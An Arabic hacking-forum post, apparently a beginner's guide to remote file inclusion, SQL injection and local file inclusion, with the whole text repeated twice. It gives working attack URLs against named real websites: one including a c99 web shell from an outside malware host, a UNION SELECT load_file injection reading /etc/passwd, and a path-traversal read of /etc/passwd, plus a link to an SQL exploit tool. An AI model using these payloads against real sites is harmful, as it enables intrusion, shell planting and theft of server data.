[size=12]بسم الله الرحمن الرحيم
كيفكم اخواني انشا الله بخير
موضوعنا اليوم
نبذه عن معظم انواع الثغرات بإذن الله العظيم
بسم الله بدأنآ
1 - ثغرات ريموت فايل انكلود Remot File include
طبعا من اشهر انواع الثغرات
سببها ،، قيام المبرمج بعمل خطأ فادح, وهو السماح لدالة انكلود
بأن تقوم بأستدعاء اى ملف وليس ملف محدد , ومنها يمكن للمخرب ان يقوم بأستدعاء ملف خارجى
كالشيل مثلا s1
لكن قليلة في وقتنا هذ1
طبعا الثغرة بتسمح لك ادراج ملف من خارج الموقع وهذا الملف بكون عبارة عن شيل s1
خلينا نشوف مثال
كود PHP:
http://www.insights.co.il/site.php?page=http://shaja.malware-site.www/c99.txt?
معنا الموقع هذا
الملف المصاب site.php
المتغير المصاب ?page
=http://shaja.malware-site.www/c99.txt
رابط الشيل اللي هندرجو داخل الموقع
عن طريق الملف + المتغير المصاب
طبعآ لاننسى علامة الاستفهام ؟
انتهيها من النوع الأول
---------------------------------------------
2- SQL injection سكيول انجكشن
طبعا تنقسم الى قسمين SQL injection php وهو الحقن في ملفات الـ php
و SQL injection asp الحقن في ملفات asp يعني سيرفرات الويندوز والمواقع اللتي تستخدم ملفات asp
توضيح :
وهي ثغرات الحقن في قواعد البيانات
خطورة الثغرة خطيرة جدآ
لانها تسمح للمخترق بإستخراج بيانات المدير العام (admin)
وتسمح بحقن شيل في احدى المجلدات المصرحة مثل tmp/ images ...الخ
مثال على موقع مصاب بثغرة الحقن
كود PHP:
http://www.dtincr.ph/news.php?id=1
لاحظ لو اضفت بعد المتغير 1 علامة '
فلاحظ وجود الخطأ
كود PHP:
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/dtincr/public_html/news.php on line 20
طبعا هذا خطأ سكيول
خلينا نشرح عنه شوية
اللي بهمنا news.php?id=1
news.php الملف المصاب
?id=1 المتغير المصاب
طبعا بيكون اكثر من رقم واحد
مثال ?id=42 ...الخ
مثال حي على استغلال ثغرة سكيول انجكشن
كود PHP:
http://faganmedia.com/profile.php?id=%27+UNION+SELECT+1,2,3,4,5,load_file(%27/etc/passwd%27),7,8,9--+
طبعا قمت باستغلال امر load_file وقرأت اليوزرات والمسارات للسيرفر عن طريق الامر etc/passwd
'طبعا الماجيك كوتس اوف لو انو اون كان ماعرفت أقرأ شي
شرح من الاخ Red-D3v1L
لاكتشاف واستغلال ثغرات الـ sql
كود PHP:
http://www.4shared.com/file/101817977/f7f91468/SQL_ExPloit.html
[size=12]
انتهينا من ثغرات الحقن
------------------------------------------
3 - ثغرات اللوكال فايل انكلود local file include
طبعا هذه الثغرة تسمح لك بقراءة ملفات من السيرفر s1
مثل ملف الشادو المهم lol
مثال على قرآءة امر استخراج يوزرات ومسارات السيرفر
http://www.museumsinsel-berlin.de/in.../../etc/passwd
طبعا الملف المصاب index.php
كيفكم اخواني انشا الله بخير
موضوعنا اليوم
نبذه عن معظم انواع الثغرات بإذن الله العظيم
بسم الله بدأنآ
1 - ثغرات ريموت فايل انكلود Remot File include
طبعا من اشهر انواع الثغرات
سببها ،، قيام المبرمج بعمل خطأ فادح, وهو السماح لدالة انكلود
بأن تقوم بأستدعاء اى ملف وليس ملف محدد , ومنها يمكن للمخرب ان يقوم بأستدعاء ملف خارجى
كالشيل مثلا s1
لكن قليلة في وقتنا هذ1
طبعا الثغرة بتسمح لك ادراج ملف من خارج الموقع وهذا الملف بكون عبارة عن شيل s1
خلينا نشوف مثال
كود PHP:
http://www.insights.co.il/site.php?page=http://shaja.malware-site.www/c99.txt?
معنا الموقع هذا
الملف المصاب site.php
المتغير المصاب ?page
=http://shaja.malware-site.www/c99.txt
رابط الشيل اللي هندرجو داخل الموقع
عن طريق الملف + المتغير المصاب
طبعآ لاننسى علامة الاستفهام ؟
انتهيها من النوع الأول
---------------------------------------------
2- SQL injection سكيول انجكشن
طبعا تنقسم الى قسمين SQL injection php وهو الحقن في ملفات الـ php
و SQL injection asp الحقن في ملفات asp يعني سيرفرات الويندوز والمواقع اللتي تستخدم ملفات asp
توضيح :
وهي ثغرات الحقن في قواعد البيانات
خطورة الثغرة خطيرة جدآ
لانها تسمح للمخترق بإستخراج بيانات المدير العام (admin)
وتسمح بحقن شيل في احدى المجلدات المصرحة مثل tmp/ images ...الخ
مثال على موقع مصاب بثغرة الحقن
كود PHP:
http://www.dtincr.ph/news.php?id=1
لاحظ لو اضفت بعد المتغير 1 علامة '
فلاحظ وجود الخطأ
كود PHP:
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/dtincr/public_html/news.php on line 20
طبعا هذا خطأ سكيول
خلينا نشرح عنه شوية
اللي بهمنا news.php?id=1
news.php الملف المصاب
?id=1 المتغير المصاب
طبعا بيكون اكثر من رقم واحد
مثال ?id=42 ...الخ
مثال حي على استغلال ثغرة سكيول انجكشن
كود PHP:
http://faganmedia.com/profile.php?id=%27+UNION+SELECT+1,2,3,4,5,load_file(%27/etc/passwd%27),7,8,9--+
طبعا قمت باستغلال امر load_file وقرأت اليوزرات والمسارات للسيرفر عن طريق الامر etc/passwd
'طبعا الماجيك كوتس اوف لو انو اون كان ماعرفت أقرأ شي
شرح من الاخ Red-D3v1L
لاكتشاف واستغلال ثغرات الـ sql
كود PHP:
http://www.4shared.com/file/101817977/f7f91468/SQL_ExPloit.html
[size=12]
انتهينا من ثغرات الحقن
------------------------------------------
3 - ثغرات اللوكال فايل انكلود local file include
طبعا هذه الثغرة تسمح لك بقراءة ملفات من السيرفر s1
مثل ملف الشادو المهم lol
مثال على قرآءة امر استخراج يوزرات ومسارات السيرفر
http://www.museumsinsel-berlin.de/in.../../etc/passwd
طبعا الملف المصاب index.php